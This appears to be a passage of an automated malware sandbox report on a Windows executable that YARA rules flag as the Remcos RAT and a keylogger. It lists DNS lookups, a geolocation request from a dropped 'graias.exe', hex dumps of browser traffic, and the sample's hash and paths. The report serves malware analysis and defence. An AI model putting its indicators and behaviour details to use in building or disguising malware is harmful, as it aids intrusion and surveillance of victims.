                                                                                                                                                                                            Jan 4, 2025 18:44:10.424508095 CET1.1.1.1192.168.2.40xdd3fNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:44:10.424508095 CET1.1.1.1192.168.2.40xdd3fNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:44:21.032882929 CET1.1.1.1192.168.2.40xaa50No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:44:21.036631107 CET1.1.1.1192.168.2.40x2116No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:44:30.729672909 CET1.1.1.1192.168.2.40x932fNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:44:30.731539011 CET1.1.1.1192.168.2.40xe8bcNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:45:11.832892895 CET1.1.1.1192.168.2.40xc52fNo error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:45:11.834832907 CET1.1.1.1192.168.2.40xebf8No error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:45:13.819253922 CET1.1.1.1192.168.2.40xbfecNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:45:13.819253922 CET1.1.1.1192.168.2.40xbfecNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:45:13.819253922 CET1.1.1.1192.168.2.40xbfecNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:45:13.819689035 CET1.1.1.1192.168.2.40x1c3aNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:45:13.821937084 CET1.1.1.1192.168.2.40x2b14No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:45:13.821937084 CET1.1.1.1192.168.2.40x2b14No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:45:13.823463917 CET1.1.1.1192.168.2.40x344dNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:45:13.823463917 CET1.1.1.1192.168.2.40x344dNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:45:13.823463917 CET1.1.1.1192.168.2.40x344dNo error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.nets-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:45:13.823463917 CET1.1.1.1192.168.2.40x344dNo error (0)s-part-0032.t-0009.t-msedge.net13.107.246.60A (IP address)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:45:31.801892042 CET1.1.1.1192.168.2.40xc958No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:45:31.815570116 CET1.1.1.1192.168.2.40xca5eNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:45:32.020581961 CET1.1.1.1192.168.2.40x9e48No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:45:32.021120071 CET1.1.1.1192.168.2.40x3d3bNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:46:07.335469961 CET1.1.1.1192.168.2.40xdc5fNo error (0)www.google.com142.250.185.164A (IP address)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:46:07.335668087 CET1.1.1.1192.168.2.40x939eNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:46:11.831253052 CET1.1.1.1192.168.2.40xca58No error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Jan 4, 2025 18:46:11.848225117 CET1.1.1.1192.168.2.40x60faNo error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false

                                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                                            • https:
                                                                                                                                                                                              • js.monitor.azure.com
                                                                                                                                                                                            • geoplugin.net

                                                                                                                                                                                            HTTP Packets

                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            0192.168.2.449737178.237.33.50807328C:\Users\user\AppData\Roaming\Graias\graias.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 4, 2025 18:41:58.580275059 CET71OUTGET /json.gp HTTP/1.1
                                                                                                                                                                                            Host: geoplugin.net
                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                            Jan 4, 2025 18:41:59.198915005 CET1171INHTTP/1.1 200 OK
                                                                                                                                                                                            date: Sat, 04 Jan 2025 17:41:59 GMT
                                                                                                                                                                                            server: Apache
                                                                                                                                                                                            content-length: 963
                                                                                                                                                                                            content-type: application/json; charset=utf-8
                                                                                                                                                                                            cache-control: public, max-age=300
                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                            Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                                                                                                                                                            Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            0192.168.2.44975813.107.246.454438096C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2025-01-04 17:42:06 UTC549OUTGET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                                                                                                                            Host: js.monitor.azure.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Referer: https://learn.microsoft.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2025-01-04 17:42:07 UTC889INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Sat, 04 Jan 2025 17:42:07 GMT
                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                            Content-Length: 207935
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                                                                                                                            Last-Modified: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                                            ETag: 0x8DCEC757C1AD1D1
                                                                                                                                                                                            x-ms-request-id: 275be117-b01e-0006-4a05-581325000000
                                                                                                                                                                                            x-ms-version: 2009-09-19
                                                                                                                                                                                            x-ms-meta-jssdkver: 4.3.3
                                                                                                                                                                                            x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.3.min.js
                                                                                                                                                                                            Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            x-azure-ref: 20250104T174206Z-156796c549bndwlbhC1EWRbq0c0000000v10000000008thr
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2025-01-04 17:42:07 UTC15495INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 4c 4c 20 53 4b 55 2c 20 34 2e 33 2e 33 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 21 3d 6e 29 74 28 65 78 70 6f 72 74 73 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69
                                                                                                                                                                                            Data Ascii: /*! * 1DS JSLL SKU, 4.3.3 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&defi
                                                                                                                                                                                            2025-01-04 17:42:07 UTC16384INData Raw: 28 69 29 3a 28 72 3d 66 65 28 22 63 6f 6e 73 6f 6c 65 22 29 29 26 26 28 72 2e 65 72 72 6f 72 7c 7c 72 2e 6c 6f 67 29 28 74 2c 63 65 28 69 29 29 29 29 7d 53 65 28 61 3d 7b 74 68 65 6e 3a 6f 2c 22 63 61 74 63 68 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 28 75 6e 64 65 66 69 6e 65 64 2c 65 29 7d 2c 22 66 69 6e 61 6c 6c 79 22 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2c 6e 3d 74 3b 72 65 74 75 72 6e 20 51 28 74 29 26 26 28 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 26 26 74 28 29 2c 65 7d 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 74 26 26 74 28 29 2c 65 7d 29 2c 6f 28 65 2c 6e 29 7d 7d 2c 22 73 74 61 74 65 22 2c 7b 67 65 74 3a 64 7d 29 2c 68 74 28 29 26 26 28 61 5b 6d 74 28
                                                                                                                                                                                            Data Ascii: (i):(r=fe("console"))&&(r.error||r.log)(t,ce(i))))}Se(a={then:o,"catch":function(e){return o(undefined,e)},"finally":function(t){var e=t,n=t;return Q(t)&&(e=function(e){return t&&t(),e},n=function(e){throw t&&t(),e}),o(e,n)}},"state",{get:d}),ht()&&(a[mt(
                                                                                                                                                                                            2025-01-04 17:42:07 UTC16384INData Raw: 28 65 2c 74 2c 6e 2c 72 29 7b 67 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 65 5b 74 5d 26 26 28 6e 3f 28 6e 2e 63 62 5b 74 65 5d 28 7b 66 6e 3a 72 2c 61 72 67 3a 65 7d 29 2c 6e 2e 68 3d 6e 2e 68 7c 7c 6e 6e 28 70 63 2c 30 2c 6e 29 29 3a 4d 28 72 2c 5b 65 5d 29 29 7d 29 7d 68 63 2e 5f 5f 69 65 44 79 6e 3d 31 3b 76 61 72 20 76 63 3d 68 63 3b 66 75 6e 63 74 69 6f 6e 20 68 63 28 65 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 3d 5b 5d 3b 76 61 72 20 6e 2c 69 3d 5b 5d 2c 61 3d 7b 68 3a 6e 75 6c 6c 2c 63 62 3a 5b 5d 7d 2c 6f 3d 76 6f 28 65 2c 64 63 29 5b 4b 6e 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 3d 21 21 65 2e 63 66 67 2e 70 65 72 66 45 76 74 73 53 65 6e 64 41 6c 6c 7d 29 3b 76 65 28 68 63 2c 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                            Data Ascii: (e,t,n,r){ge(e,function(e){e&&e[t]&&(n?(n.cb[te]({fn:r,arg:e}),n.h=n.h||nn(pc,0,n)):M(r,[e]))})}hc.__ieDyn=1;var vc=hc;function hc(e){this.listeners=[];var n,i=[],a={h:null,cb:[]},o=vo(e,dc)[Kn](function(e){n=!!e.cfg.perfEvtsSendAll});ve(hc,this,function(
                                                                                                                                                                                            2025-01-04 17:42:07 UTC16384INData Raw: 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 2e 66 6c 75 73 68 43 6f 6d 70 6c 65 74 65 3d 65 2c 50 3d 21 30 2c 52 2e 72 75 6e 28 6f 2c 61 29 2c 66 5b 67 72 5d 28 29 2c 6f 5b 6c 72 5d 28 61 29 7d 2c 36 2c 6e 29 2c 69 7d 2c 66 5b 6f 72 5d 3d 73 2c 66 2e 61 64 64 50 6c 75 67 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 6f 75 29 3b 76 61 72 20 69 3d 73 28 65 5b 24 6e 5d 29 3b 69 66 28 69 26 26 21 74 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 22 50 6c 75 67 69 6e 20 5b 22 2b 65 5b 24 6e 5d 2b 22 5d 20 69 73 20 61 6c 72 65 61 64 79 20 6c 6f 61 64 65 64 21 22 29 3b 76 61 72 20 61 2c 6f 3d 7b 72 65 61 73 6f 6e 3a 31 36 7d 3b 66
                                                                                                                                                                                            Data Ascii: (e,function(e){a.flushComplete=e,P=!0,R.run(o,a),f[gr](),o[lr](a)},6,n),i},f[or]=s,f.addPlugin=function(e,t,n,r){if(!e)return r&&r(!1),void C(ou);var i=s(e[$n]);if(i&&!t)return r&&r(!1),void C("Plugin ["+e[$n]+"] is already loaded!");var a,o={reason:16};f
                                                                                                                                                                                            2025-01-04 17:42:07 UTC16384INData Raw: 6c 3a 31 2c 43 72 69 74 69 63 61 6c 3a 32 7d 29 2c 75 6e 64 65 66 69 6e 65 64 2c 75 6e 64 65 66 69 6e 65 64 29 2c 53 6c 3d 22 22 3b 66 75 6e 63 74 69 6f 6e 20 78 6c 28 65 29 7b 74 72 79 7b 69 66 28 6f 65 28 6f 74 28 29 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 74 3d 28 6e 65 77 20 44 61 74 65 29 5b 4f 73 5d 28 29 2c 6e 3d 66 65 28 65 3d 3d 3d 45 6c 2e 4c 6f 63 61 6c 53 74 6f 72 61 67 65 3f 22 6c 6f 63 61 6c 53 74 6f 72 61 67 65 22 3a 22 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 22 29 2c 72 3d 53 6c 2b 74 2c 69 3d 28 6e 2e 73 65 74 49 74 65 6d 28 72 2c 74 29 2c 6e 2e 67 65 74 49 74 65 6d 28 72 29 21 3d 3d 74 29 3b 69 66 28 6e 5b 52 73 5d 28 72 29 2c 21 69 29 72 65 74 75 72 6e 20 6e 7d 63 61 74 63 68 28 61 29 7b 7d 72 65 74 75 72 6e 20 6e 75 6c
                                                                                                                                                                                            Data Ascii: l:1,Critical:2}),undefined,undefined),Sl="";function xl(e){try{if(oe(ot()))return null;var t=(new Date)[Os](),n=fe(e===El.LocalStorage?"localStorage":"sessionStorage"),r=Sl+t,i=(n.setItem(r,t),n.getItem(r)!==t);if(n[Rs](r),!i)return n}catch(a){}return nul
                                                                                                                                                                                            2025-01-04 17:42:07 UTC16384INData Raw: 6f 20 74 72 61 63 6b 20 70 61 67 65 20 76 69 73 69 74 20 74 69 6d 65 20 66 61 69 6c 65 64 2c 20 6d 65 74 72 69 63 20 77 69 6c 6c 20 6e 6f 74 20 62 65 20 63 6f 6c 6c 65 63 74 65 64 3a 20 22 2b 63 65 28 72 29 29 7d 7d 2c 59 28 65 2c 22 5f 6c 6f 67 67 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 59 28 65 2c 22 70 61 67 65 56 69 73 69 74 54 69 6d 65 54 72 61 63 6b 69 6e 67 48 61 6e 64 6c 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 7d 29 7d 76 61 72 20 4e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 5b 67 64 5d 3d 50 74 28 29 2c 74 68 69 73 2e 70 61 67 65 4e 61 6d 65 3d 65 2c 74 68 69 73 2e 70 61 67 65 55 72 6c 3d 74 7d 2c 44 64 3d 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                            Data Ascii: o track page visit time failed, metric will not be collected: "+ce(r))}},Y(e,"_logger",{g:function(){return o}}),Y(e,"pageVisitTimeTrackingHandler",{g:function(){return c}})})}var Nd=function(e,t){this[gd]=Pt(),this.pageName=e,this.pageUrl=t},Dd=function(
                                                                                                                                                                                            2025-01-04 17:42:07 UTC16384INData Raw: 63 6f 72 65 44 61 74 61 2c 22 62 65 68 61 76 69 6f 72 22 29 2c 75 65 28 6e 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 6e 2e 70 61 67 65 54 79 70 65 29 2c 75 65 28 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 26 26 21 75 65 28 65 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 2c 75 65 28 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 26 26 28 65 2e 6d 61 72 6b 65 74 3d 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 2c 65 2e 69 73 4c 6f 67 67 65 64 49 6e 3d 47 64 28 72 2e 5f 63 6f 6e 66 69 67 29 2c 74 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 3d 6f 63 28 29 7d 2c 69 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73 65 74 50 61 67 65 54
                                                                                                                                                                                            Data Ascii: coreData,"behavior"),ue(n.pageType)&&(e.pageType=n.pageType),ue(r._pageTypeMetaTag)&&!ue(e.pageType)&&(e.pageType=r._pageTypeMetaTag),ue(r._marketMetaTag)&&(e.market=r._marketMetaTag),e.isLoggedIn=Gd(r._config),t.cookieEnabled=oc()},ip.prototype._setPageT
                                                                                                                                                                                            2025-01-04 17:42:07 UTC16384INData Raw: 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 57 69 74 68 44 61 74 61 42 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 62 69 2d 22 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 22 64 61 74 61 2d 6d 22 3d 3d 3d 74 5b 6e 5d 2e 6e 61 6d
                                                                                                                                                                                            Data Ascii: n!0;return!1},Ap.prototype._isTrackedWithDataBi=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if(~t[n].name.indexOf("data-bi-"))return!0;return!1},Ap.prototype._isTracked=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if("data-m"===t[n].nam
                                                                                                                                                                                            2025-01-04 17:42:07 UTC16384INData Raw: 75 74 68 54 6f 6b 65 6e 22 2c 61 3d 22 41 75 74 68 58 54 6f 6b 65 6e 22 2c 67 67 3d 22 6d 73 66 70 63 22 2c 76 67 3d 22 75 73 65 72 22 2c 68 67 3d 22 61 6c 6c 6f 77 52 65 71 75 65 73 74 53 65 6e 64 69 6e 67 22 2c 6d 67 3d 22 66 69 72 73 74 52 65 71 75 65 73 74 53 65 6e 74 22 2c 79 67 3d 22 73 68 6f 75 6c 64 41 64 64 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 73 22 2c 43 67 3d 22 67 65 74 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 56 61 6c 75 65 22 2c 62 67 3d 22 73 65 74 43 6c 6f 63 6b 53 6b 65 77 22 2c 79 65 3d 22 6c 65 6e 67 74 68 22 2c 54 67 3d 22 63 6f 6e 63 61 74 22 2c 49 67 3d 22 69 4b 65 79 22 2c 45 67 3d 22 63 6f 75 6e 74 22 2c 5f 67 3d 22 65 76 65 6e 74 73 22 2c 53 67 3d 22 70 75 73 68 22 2c 78 67 3d 22 73 70 6c 69 74 22 2c 4e 67 3d 22 73 70
                                                                                                                                                                                            Data Ascii: uthToken",a="AuthXToken",gg="msfpc",vg="user",hg="allowRequestSending",mg="firstRequestSent",yg="shouldAddClockSkewHeaders",Cg="getClockSkewHeaderValue",bg="setClockSkew",ye="length",Tg="concat",Ig="iKey",Eg="count",_g="events",Sg="push",xg="split",Ng="sp
                                                                                                                                                                                            2025-01-04 17:42:07 UTC16384INData Raw: 29 29 2c 65 5b 6c 76 5d 26 26 28 65 5b 6c 76 5d 3d 65 61 28 65 5b 6c 76 5d 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 65 5b 79 76 5d 7c 7c 28 65 5b 79 76 5d 3d 30 29 2c 65 5b 43 76 5d 7c 7c 28 65 5b 43 76 5d 3d 31 29 2c 6c 28 65 29 2c 65 5b 62 76 5d 29 69 66 28 55 7c 7c 61 65 29 65 5b 43 76 5d 3d 33 2c 65 5b 62 76 5d 3d 21 31 3b 65 6c 73 65 20 69 66 28 48 29 72 65 74 75 72 6e 20 57 26 26 28 65 3d 65 61 28 65 29 29 2c 48 5b 72 76 5d 28 45 76 2e 63 72 65 61 74 65 28 65 5b 49 67 5d 2c 5b 65 5d 29 2c 21 30 3d 3d 3d 65 5b 62 76 5d 3f 31 3a 65 5b 62 76 5d 2c 33 29 3b 76 61 72 20 6e 3d 65 5b 43 76 5d 2c 72 3d 63 65 2c 69 3d 52 2c 61 3d 28 34 3d 3d 3d 6e 26 26 28 72 3d 6f 65 2c 69 3d 4f 29 2c 21 31 29 3b 72 3c 69 3f 61 3d 21 43 28 65 2c
                                                                                                                                                                                            Data Ascii: )),e[lv]&&(e[lv]=ea(e[lv])))}function a(e,t){if(e[yv]||(e[yv]=0),e[Cv]||(e[Cv]=1),l(e),e[bv])if(U||ae)e[Cv]=3,e[bv]=!1;else if(H)return W&&(e=ea(e)),H[rv](Ev.create(e[Ig],[e]),!0===e[bv]?1:e[bv],3);var n=e[Cv],r=ce,i=R,a=(4===n&&(r=oe,i=O),!1);r<i?a=!C(e,


                                                                                                                                                                                            Statistics

                                                                                                                                                                                            CPU Usage

                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            Memory Usage

                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                            Behavior

                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            System Behavior

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                            Start time:12:41:50
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Users\user\Desktop\4XYAW8PbZH.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\4XYAW8PbZH.exe"
                                                                                                                                                                                            Imagebase:0x4c0000
                                                                                                                                                                                            File size:985'600 bytes
                                                                                                                                                                                            MD5 hash:4A9440BAA61BE8363A372B0BBC5933AD
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.1832995156.0000000004425000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1832995156.0000000004425000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
